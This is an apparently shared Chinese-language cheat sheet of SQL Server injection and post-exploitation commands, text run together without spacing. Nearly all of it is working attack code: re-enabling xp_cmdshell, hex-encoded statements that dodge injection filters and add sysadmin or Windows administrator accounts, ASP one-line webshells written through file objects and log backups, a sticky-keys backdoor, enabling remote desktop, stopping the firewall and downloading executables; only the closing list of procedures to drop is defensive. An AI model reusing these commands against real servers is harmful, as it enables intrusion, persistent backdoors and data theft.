SQL高级注入使用之存储过程

SQL高级注入使用之存储过程以下这都是我们老师给我的学习资料呵呵 !!其实我也有的看不懂,给朋友们中的一些高手看看!我还是菜鸟呢-_-!。。。。。。sql2005恢复xp_cmdshellEXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;关闭:EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;零、-----------------添加SA用户-----------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&1、2、3、&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&防注入sa:itpropass:itprodeclare@svarchar(4000set@s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e20697470726fasvarchar(4000;exec(@s;declare@cvarchar(4000set@c=cast(0x65786563206d61737465722e64626f2e73705f70617373776f7264206e756c6c2c697470726f2c697470726fasvarchar(4000;exec(@c;declare@avarchar(4000setd6265722027697470726f272c2073797361646d696easvarchar(4000;exec(@a;--and1=1防注入sa:systempass:systemdeclare@svarchar(4000set@s=cast(0x65786563206d61737465722e64626f2e73705f6164646c6f67696e2073797374656d2c73797374656dasvarchar(4000;exec(@s;declare@avarchar(4000setd626572202773797374656d272c2073797361646d696easvarchar(4000;exec(@a;--and1=1一、---------------恢复存储过程 ---------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&usemasterexecsp_addextendedprocxp_cmdshell,'xp_cmdshell.dll'execsp_dropextendedproc"xp_cmdshell"execsp_addextendedproc'xp_cmdshell','xpsql70.dll'execsp_dropextendedproc'xp_cmdshell'execsp_addextendedproc'xp_cmdshell','xpweb70.dll'execsp_addextendedprocxp_dirtree,'xpstar.dll'execsp_addextendedprocxp_enumgroups,'xplog70.dll'execsp_addextendedprocxp_fixeddrives,'xpstar.dll'execsp_addextendedprocxp_loginconfig,'xplog70.dll'execsp_addextendedprocxp_enumerrorlogs,'xpstar.dll'execsp_addextendedprocxp_getfiledetails,'xpstar.dll'execsp_addextendedprocsp_OACreate,'odsole70.dll'execsp_addextendedprocsp_OADestroy,'odsole70.dll'execsp_addextendedprocsp_OAGetErrorInfo,'odsole70.dll'execsp_addextendedprocsp_OAGetProperty,'odsole70.dll'execsp_addextendedprocsp_OAMethod,'odsole70.dll'execsp_addextendedprocsp_OASetProperty,'odsole70.dll'execsp_addextendedprocsp_OAStop,'odsole70.dll'execsp_addextendedprocxp_regaddmultistring,'xpstar.dll'execsp_addextendedprocxp_regdeletekey,'xpstar.dll'execsp_addextendedprocxp_regdeletevalue,'xpstar.dll'execsp_addextendedprocxp_regenumvalues,'xpstar.dll'execsp_addextendedprocxp_regread,'xpstar.dll'execsp_addextendedprocxp_regremovemultistring,'xpstar.dll'execsp_addextendedprocxp_regwrite,'xpstar.dll'execsp_addextendedprocxp_availablemedia,'xpstar.dll'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&恢复cmdshell防注入============================================================declare@avarchar(255,@bvarchar(255,@cvarchar(255;set@b=0x78705F636D647368656C6C;set@c=0x78706C6F6737302E646C6C;exec@a@b,@c============================================================二、------------------------------------恢复sp_addextendedproc存储过程------------------------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&createproceduresp_addextendedproc---1996/08/3020:13@functnamenvarchar(517,/*(offunctiontocall*/@dllnamevarchar(255/*nameofDLLcontainingfunction*/assetimplicit_transactionsoffif@@trancount>0beginraiserror(15002,-1,-1,'sp_addextendedproc'return(1enddbccaddextendedproc(@functname,@dllnamereturn(0--sp_addextendedprocGO&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&三、----------------------------使用存储过程加管理方法 ----------------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&1、2、EXECsp_resolve_logins'text','e:\asp\"&netuseradminaadmin/add&netlocalgroupadministratorsadmina/add&dir"e:\asp','1.asp'3、DECLARE@shellINTEXECSP_OAcreate'wscript.shell',@shellOUTPUTEXECSP_OAMETHOD@shell,'run',null,'C:\WINdows\system32\cmd.exe/cnetusersadfishfish/add'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&四、---------------------------导出文件的存储过程 ---------------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&DECLARE@shellINTEXECSP_OAcreate'wscript.shell',@shellOUTPUTEXECSP_OAMETHOD@shell,'run',null,'C:\WINdows\system32\cmd.exe/cnetstat-an>c:\1.txt'&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&五、-----------------------------读取文件的存储过程 -----------------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&declare@oint,@fint,@tint,@retintdeclare@linevarchar(8000execsp_oacreate'scripting.filesystemobject',@ooutexecsp_oamethod@o,'opentextfile',@fout,'c:\1.txt',1exec@ret=sp_oamethod@f,'readline',@lineoutwhile(@ret=0beginprint@lineexec@ret=sp_oamethod@f,'readline',@lineoutend&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&六、---------------------------写一句话木马---------------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&declare@oint,@fint,@tint,@retintexecsp_oacreate'scripting.filesystemobject',@ooutexecsp_oamethod@o,'createtextfile',@fout,'c:\Inetpub\tianhong\2.asp',1exec@ret=sp_oamethod@f,'writeline',NULL,'<%execute(request("a"%>'''单引号为要写的内容<%25ifrequest("x"<>""thenexecute(request("x"%25>&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&防注入写入法============================================================declare@aint,@bint,@cvarchar(255,@dvarchar(255,@evarchar(255,@fvarchar(255,@gvarchar(255,@hvarchar(255,@ivarchar(255,@jvarchar(255;set@d=0x6D61737465722E2E73705F6F616D6574686F64;set@e=0x536372697074696E672E46696C6573797374656D4F626A656374;set@g=0x433A5C496E65747075625C73797374656D2E617370;set@h=0x74727565;set@i=0x7772697465;exec@c@e,@aoutput;exec@d@a,@f,@boutput,@g,@h;exec@d@b,@i,null,@j==================================================================七、---------------------------写一句话木马---------------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxdeclare@snvarchar(4000;select@s=0x730065006c00650063007400200027003c002500450078006500630075007400650028007200650071007and%1=1在上面一样;exec%20sp_makewebtask%20'd:\zjkdj\zjkdj\zjkds\bake.asp,'%20select%20''<%25execute(request("a"%25>''%20';--xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx八、-------------------------SA沙盒模式提权---------------------------&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&1、execmaster..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;--2、Select*Fromelectshell("netuseritprogmasfm/add"';&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&九、-------------------------另类SA提权-------------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx2、declare@oointexecsp_oacreate'scripting.filesystemobject',@oooutexecsp_oamethod@oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe';1、declare@ointexecsp_oacreate'scripting.filesystemobject',@ooutexecsp_oamethod@o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';DECLARE@ointDECLARE@zintEXECsp_OACreate'Shell.Users',@oOUTEXECsp_OAMethod@o,'Create',@zOUT,'test'EXECsp_OASetProperty@z,'setting',3,'AccountType'EXECsp_OAMethod@z,'ChangePassword',NULL,'123456',''xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十、----------------导出注册表----------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1、droptable[regdir];createtable[regdir](valuenvarchar(1000null,datanvarchar(1000null--2、delete[regdir];insert[regdir]execmaster..xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十一、-------------------下载程序---------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1、@hr=sp_oamethod@down,[savetofile],null,[c:/a.exe],1;--and1=1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十二、------------------Log备份WebShell------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxalterdatabasemastersetRECOVERYFULLcreatetablecmd(aimage--backuplogmastertodisk='c:\cmd'withinitinsertintocmd(avalues('<%eval(request("a":response.end%>'--backuplogmastertodisk='C:\Inetpub\wwwroot\ri3.asp'--droptablecmd--2\usemiralterdatabasemirsetRECOVERYFULL--createtablecmd8(aimage--backuplogmirtodisk='c:\cmd8'withinit--insertintocmd8(avalues('<%eval(request("a":response.end%>'--backuplogmirtodisk='c:\backup.asp'--droptablecmd8--alterdatabasemirsetRECOVERYSIMPLE--3\create/**/table/**/[dbo].[shit_tmp]/**/([cmd]/**/[image]--declare/**/@a/**/sysname,@s/**/nvarchar(4000/**/select/**/@a=db_name(,@s=0x6C0061006F007A0068006F007500/**/backup/**/log/**/@a/**/to/**/disk/**/=/**/@s/**/with/**/init,no_truncate--init,no_truncate--Drop/**/table/**/[shit_tmp]--xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十三、---------------------------------创建sp_readtextfile存储过程---------------------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxCreateprocsp_readTextFile@filenamesysnameasbeginsetnocountonCreatetable#tempfile(linevarchar(8000exec('bulkinsert#tempfilefrom"'+@filename+'"'select*from#tempfiledroptable#tempfileEndgoxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx十四、开3389===================================================================declare@avarchar(255,@bvarchar(255;set@a=0x6D61737465722E64626F2E78705F636D647368656C6C;set@b=0x636D64202F6320776D6963205244544F47474C45205748455245205365727665724E616D653D2725434F4D50555445524E414D4525272063616C6C20536574416C6C6F775453436F6E6E656374696F6E732031;exec@a@b===================================================================我记得2003的web目录是写在C:\WINDOWS\system32\inetsrv\MetaBase.xml--------------------读取文件内容-------------------execsp_readTextFile'c:\boot.ini'xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe','debugger','reg_sz','c:\windows\system32\cmd.exe'--------------------------清除MsSql日志------------------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxsetnocountondeclare@logicalfilenamesysname,@maxminutesint,@newsizeintxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx------------------------停掉或激活某个服务 ------------------------execmaster..xp_servicecontrol'stop','sharedaccess'execmaster..xp_servicecontrol'start','sharedaccess'----------------------列出驱动器的名称 ----------------------EXEC[master].[dbo].[xp_availablemedia]------------------------------------列出指定目录的所有下一级子目录 ------------------------------------EXEC[master].[dbo].[xp_subdirs]'c:\windows'--------------------------------列出当前错误日志的具体内容 --------------------------------EXEC[master].[dbo].[xp_readerrorlog]------------------------列出当前计算机名称 ------------------------executemaster..xp_getnetname---------------------------------列出当前计算机的驱动器可用空间 ---------------------------------executemaster..xp_fixeddrives==========================列出服务器所有本地组 ==========================executemaster..xp_enumgroups========================获取MSSQL的版本号========================executemaster..sp_msgetversion=========================================== 参数说明:目录名,目录深度,是否显示文件===========================================executemaster..xp_dirtree'c:'executemaster..xp_dirtree'c:',1executemaster..xp_dirtree'c:',1,1===========================================列出服务器上安装的所有OLEDB提供的程序===========================================executemaster..xp_enum_oledb_providers===========================列出服务器上配置的 DNS===========================executemaster..xp_enumdsn删除存储过程dropPROCEDUREsp_addextendedproc-------------------------删除sql危险存储过程-------------------------xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxDROPPROCEDUREsp_makewebtaskexecmaster..sp_dropextendedprocxp_cmdshellexecmaster..sp_dropextendedprocxp_dirtreeexecmaster..sp_dropextendedprocxp_fileexistexecmaster..sp_dropextendedprocxp_terminate_processexecmaster..sp_dropextendedprocsp_oamethodexecmaster..sp_dropextendedprocsp_oacreateexecmaster..sp_dropextendedprocxp_regaddmultistringexecmaster..sp_dropextendedprocxp_regdeletekeyexecmaster..sp_dropextendedprocxp_regdeletevalueexecmaster..sp_dropextendedprocxp_regenumkeysexecmaster..sp_dropextendedprocxp_regenumvaluesexecmaster..sp_dropextendedprocsp_add_jobexecmaster..sp_dropextendedprocsp_addtaskexecmaster..sp_dropextendedprocxp_regreadexecmaster..sp_dropextendedprocxp_regwriteexecmaster..sp_dropextendedprocxp_readwebtaskexecmaster..sp_dropextendedprocxp_makewebtaskexecmaster..sp_dropextendedprocxp_regremovemultistringexecmaster..sp_dropextendedprocsp_OACreateDROPPROCEDUREsp_addextendedprocxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxp_cmds